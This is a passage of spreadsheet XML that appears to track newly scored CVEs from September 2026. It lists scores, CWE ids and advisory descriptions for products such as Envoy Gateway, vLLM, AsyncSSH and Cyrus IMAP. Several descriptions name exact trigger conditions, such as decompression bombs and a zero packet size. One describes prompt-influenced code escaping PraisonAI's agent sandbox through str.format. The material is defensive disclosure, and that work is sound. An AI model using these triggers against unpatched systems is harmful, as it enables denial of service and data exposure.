      <c r="D886" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E886" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F886" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G886" s="5" t="inlineStr"/>
      <c r="H886" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I886" s="5" t="inlineStr"/>
      <c r="J886" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K886" s="5" t="inlineStr"/>
      <c r="L886" s="5" t="inlineStr"/>
      <c r="M886" s="5" t="inlineStr"/>
      <c r="N886" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O886" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P886" s="5" t="inlineStr"/>
      <c r="Q886" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R886" s="5" t="inlineStr">
        <is>
          <t>Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.7.4 and 1.8.1, getFileFromGZ in internal/wasm/httpfetcher.go calls io.ReadAll on a gzip.Reader without limiting decompressed output when a tenant-controlled EnvoyExtensionPolicy.spec.wasm[].code.http.url points to a reachable compressed Wasm payload. The 256 MiB compressed-input cap does not constrain the expanded size, no operator Wasm URL allowlist exists, and the optional sha256 check occurs only after decompression, so a comparatively small gzip stream can force a multi-gigabyte allocation in the shared controller. The resulting out-of-memory termination restarts the controller, re-reconciles the persistent custom resource, and can create a persistent cross-tenant control-plane outage. This issue is fixed in versions 1.7.4 and 1.8.1.</t>
        </is>
      </c>
      <c r="S886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53716</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53719</t>
        </is>
      </c>
      <c r="D887" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E887" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F887" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G887" s="5" t="inlineStr"/>
      <c r="H887" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I887" s="5" t="inlineStr"/>
      <c r="J887" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K887" s="5" t="inlineStr"/>
      <c r="L887" s="5" t="inlineStr"/>
      <c r="M887" s="5" t="inlineStr"/>
      <c r="N887" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O887" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P887" s="5" t="inlineStr"/>
      <c r="Q887" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R887" s="5" t="inlineStr">
        <is>
          <t>Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.7.4 and 1.8.1, translateSecurityPolicyForRoute in internal/gatewayapi/securitypolicy.go dereferences a nil authorization value when a namespace-scoped tenant creates a SecurityPolicy targeting a TCPRoute and omits spec.authorization. The persistent object triggers the panic on every reconcile; recovery in message/watchutil.go keeps the process alive but unwinds the runner/runner.go handle callback, stalling controller-wide xDS and infrastructure intermediate-representation publishing until an administrator deletes the object. The data plane continues to serve the last known good configuration while publication is stalled. This issue is fixed in versions 1.7.4 and 1.8.1.</t>
        </is>
      </c>
      <c r="S887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53719</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57120</t>
        </is>
      </c>
      <c r="D888" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E888" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F888" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G888" s="5" t="inlineStr"/>
      <c r="H888" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I888" s="5" t="inlineStr"/>
      <c r="J888" s="5" t="inlineStr"/>
      <c r="K888" s="5" t="inlineStr"/>
      <c r="L888" s="5" t="inlineStr"/>
      <c r="M888" s="5" t="inlineStr"/>
      <c r="N888" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O888" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P888" s="5" t="inlineStr"/>
      <c r="Q888" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R888" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.59, execute_code sandbox mode permits runtime assembly of blocklisted dunder names and allows str.format or str.format_map to resolve dotted fields through C-level attribute access that bypasses _safe_getattr. This exposes class, qualified-name, base-class, globals, and object-dictionary attributes to prompt-influenced code when approval is automatically granted, producing a high-impact read primitive without establishing a complete in-process execution chain. This issue is fixed in praisonaiagents 1.6.59.</t>
        </is>
      </c>
      <c r="S888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57120</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57173</t>
        </is>
      </c>
      <c r="D889" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E889" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F889" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G889" s="5" t="inlineStr"/>
      <c r="H889" s="5" t="inlineStr"/>
      <c r="I889" s="5" t="inlineStr"/>
      <c r="J889" s="5" t="inlineStr"/>
      <c r="K889" s="5" t="inlineStr"/>
      <c r="L889" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M889" s="5" t="inlineStr">
        <is>
          <t>0.24.0</t>
        </is>
      </c>
      <c r="N889" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O889" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P889" s="5" t="inlineStr"/>
      <c r="Q889" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R889" s="5" t="inlineStr">
        <is>
          <t>vLLM is an inference and serving engine for large language models. Prior to 0.24.0, the input_audio handling path for /v1/chat/completions calls AudioMediaIO.load_bytes or AudioMediaIO.load_file without passing VLLM_MAX_AUDIO_DECODE_DURATION_S to the shared audio decoder. An unauthenticated client can therefore submit a small compressed audio input that expands into a very large float32 PCM allocation, bypassing the duration guard already used by /v1/audio/transcriptions and causing an out-of-memory worker crash. Inline data URLs reach this path without being bounded by VLLM_AUDIO_FETCH_TIMEOUT. The issue affects deployments serving an audio-capable model, and authentication changes only the deployment-specific reachability. This issue is fixed in version 0.24.0.</t>
        </is>
      </c>
      <c r="S889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57173</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57822</t>
        </is>
      </c>
      <c r="D890" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E890" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F890" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G890" s="5" t="inlineStr"/>
      <c r="H890" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I890" s="5" t="inlineStr"/>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L890" s="5" t="inlineStr"/>
      <c r="M890" s="5" t="inlineStr"/>
      <c r="N890" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O890" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P890" s="5" t="inlineStr"/>
      <c r="Q890" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R890" s="5" t="inlineStr">
        <is>
          <t>When the broker is processing message-based management requests, sent by an authenticated messaging client that is authorized with MANAGE permission to perform management-via-messaging, the parameter processing can trigger Java deserialization of certain method parameters that the broker will not utilise. The permitted types allow to craft a payload causing excessive computation and pinning the processing thread, leading to denial of service.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.3.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57822</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61588</t>
        </is>
      </c>
      <c r="D891" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E891" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F891" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G891" s="5" t="inlineStr"/>
      <c r="H891" s="5" t="inlineStr"/>
      <c r="I891" s="5" t="inlineStr"/>
      <c r="J891" s="5" t="inlineStr"/>
      <c r="K891" s="5" t="inlineStr"/>
      <c r="L891" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M891" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N891" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O891" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P891" s="5" t="inlineStr"/>
      <c r="Q891" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-359</t>
        </is>
      </c>
      <c r="R891" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, when a Django `Model` instance is assigned to a public view attribute, djust serialized it to the client with no sensitive-field denylist — sending fields such as `password` (the hash), privilege flags (e.g. `is_staff` / `is_superuser`), tokens, and other PII to the browser. Because exposing model objects to templates is a normal djust pattern, this could leak credentials/PII without the developer realizing the full object crossed the wire. This is fixed in djust 1.0.7. Model serialization applies a secure-by-default sensitive-field denylist (password/hash/token/secret-style fields and known privilege flags are withheld) with an identity-subset fallback. As a workaround, keep `Model` instances on `_private` attributes and expose only the specific fields needed, until patched.</t>
        </is>
      </c>
      <c r="S891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61588</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61908</t>
        </is>
      </c>
      <c r="D892" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E892" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F892" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G892" s="5" t="inlineStr"/>
      <c r="H892" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I892" s="5" t="inlineStr"/>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L892" s="5" t="inlineStr"/>
      <c r="M892" s="5" t="inlineStr"/>
      <c r="N892" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O892" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P892" s="5" t="inlineStr"/>
      <c r="Q892" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R892" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. A JMAP email-header blob ID can reference an out-of-bounds index. An authenticated user could attempt to download a crafted JMAP blob ID of the form H&lt;emailid&gt;-&lt;index&gt;, which could read past the end of the internal blob_headers array during download, exposing adjacent heap memory.</t>
        </is>
      </c>
      <c r="S892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61908</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62801</t>
        </is>
      </c>
      <c r="D893" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E893" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F893" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G893" s="5" t="inlineStr"/>
      <c r="H893" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I893" s="5" t="inlineStr"/>
      <c r="J893" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K893"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893" s="5" t="inlineStr"/>
      <c r="M893" s="5" t="inlineStr"/>
      <c r="N893" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O893" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P893" s="5" t="inlineStr"/>
      <c r="Q893" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R893" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62949</t>
        </is>
      </c>
      <c r="D894" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E894" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F894" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G894" s="5" t="inlineStr"/>
      <c r="H894" s="5" t="inlineStr"/>
      <c r="I894" s="5" t="inlineStr"/>
      <c r="J894" s="5" t="inlineStr"/>
      <c r="K894" s="5" t="inlineStr"/>
      <c r="L894" s="5" t="inlineStr"/>
      <c r="M894" s="5" t="inlineStr"/>
      <c r="N894" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O894" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P894" s="5" t="inlineStr"/>
      <c r="Q894" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R894" s="5" t="inlineStr">
        <is>
          <t>AsyncSSH is a Python package which provides an asynchronous client and server implementation of the SSHv2 protocol on top of the Python asyncio framework. Prior to 2.24.0, _process_channel_open and _process_channel_open_confirmation in asyncssh/connection.py accept a peer-supplied send_pktsize value of zero. When channel data reaches SSHChannel._flush_send_buf in asyncssh/channel.py, the zero value causes each loop iteration to slice and remove zero bytes without reducing the send window, leaving the synchronous loop permanently true with no await point. A malicious SSH server can trigger the client path through SSH_MSG_CHANNEL_OPEN_CONFIRMATION before the first channel write, while an authenticated client can trigger the server path through SSH_MSG_CHANNEL_OPEN and freeze every current and future connection handled by the process. This vulnerability is fixed in 2.24.0.</t>
        </is>
      </c>
      <c r="S894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62949</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65395</t>
        </is>
      </c>
      <c r="D895" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E895" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F895" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G895" s="5" t="inlineStr"/>
      <c r="H895" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I895" s="5" t="inlineStr"/>
      <c r="J895" s="5" t="inlineStr"/>
      <c r="K895" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos</t>
        </is>
      </c>
      <c r="L895" s="5" t="inlineStr"/>
      <c r="M895" s="5" t="inlineStr"/>
      <c r="N895" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O895" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P895" s="5" t="inlineStr"/>
      <c r="Q895" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R895" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27. Processing a maliciously crafted image may result in memory corruption.</t>
        </is>
      </c>
      <c r="S895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65395</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65412</t>
        </is>
      </c>
      <c r="D896" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E896" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F896" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G896" s="5" t="inlineStr"/>
      <c r="H896" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I896" s="5" t="inlineStr"/>
      <c r="J896" s="5" t="inlineStr"/>
      <c r="K896" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L896" s="5" t="inlineStr"/>
      <c r="M896" s="5" t="inlineStr"/>
      <c r="N896" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O896" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P896" s="5" t="inlineStr"/>
      <c r="Q896" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R896" s="5" t="inlineStr">
        <is>
          <t>A null pointer dereference was addressed with improved input validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, visionOS 27, watchOS 27. Processing web content may lead to a denial-of-service.</t>
        </is>
      </c>
      <c r="S896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65412</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66303</t>
        </is>
      </c>
      <c r="D897" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E897" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F897" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G897" s="5" t="inlineStr"/>
      <c r="H897" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I897" s="5" t="inlineStr"/>
      <c r="J897" s="5" t="inlineStr"/>
      <c r="K897" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L897" s="5" t="inlineStr"/>
      <c r="M897" s="5" t="inlineStr"/>
      <c r="N897" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O897" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P897" s="5" t="inlineStr"/>
      <c r="Q897" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R897" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Skype for Business allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66303</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66306</t>
        </is>
      </c>
      <c r="D898" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E898" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F898" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G898" s="5" t="inlineStr"/>
      <c r="H898" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I898" s="5" t="inlineStr"/>
      <c r="J898" s="5" t="inlineStr"/>
      <c r="K898" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L898" s="5" t="inlineStr"/>
      <c r="M898" s="5" t="inlineStr"/>
      <c r="N898" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O898" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P898" s="5" t="inlineStr"/>
      <c r="Q898" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="R898" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in Skype for Business allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66306</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66308</t>
        </is>
      </c>
      <c r="D899" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E899" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F899" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G899" s="5" t="inlineStr"/>
      <c r="H899" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I899" s="5" t="inlineStr"/>
      <c r="J899" s="5" t="inlineStr"/>
      <c r="K899" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L899" s="5" t="inlineStr"/>
      <c r="M899" s="5" t="inlineStr"/>
      <c r="N899" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O899" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P899" s="5" t="inlineStr"/>
      <c r="Q899" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R899" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Skype for Business allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66308</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66816</t>
        </is>
      </c>
      <c r="D900" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E900" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F900" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G900" s="5" t="inlineStr"/>
      <c r="H900" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I900" s="5" t="inlineStr"/>
      <c r="J900" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K900" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L900" s="5" t="inlineStr"/>
      <c r="M900" s="5" t="inlineStr"/>
      <c r="N900" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O900" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P900" s="5" t="inlineStr"/>
      <c r="Q900" s="5" t="inlineStr">
        <is>
          <t>CWE-778</t>
        </is>
      </c>
      <c r="R900" s="5" t="inlineStr">
        <is>
          <t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67369</t>
        </is>
      </c>
      <c r="D901" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E901" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F901" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G901" s="5" t="inlineStr"/>
      <c r="H901" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I901" s="5" t="inlineStr"/>
      <c r="J901" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K901" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L901" s="5" t="inlineStr"/>
      <c r="M901" s="5" t="inlineStr"/>
      <c r="N901" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
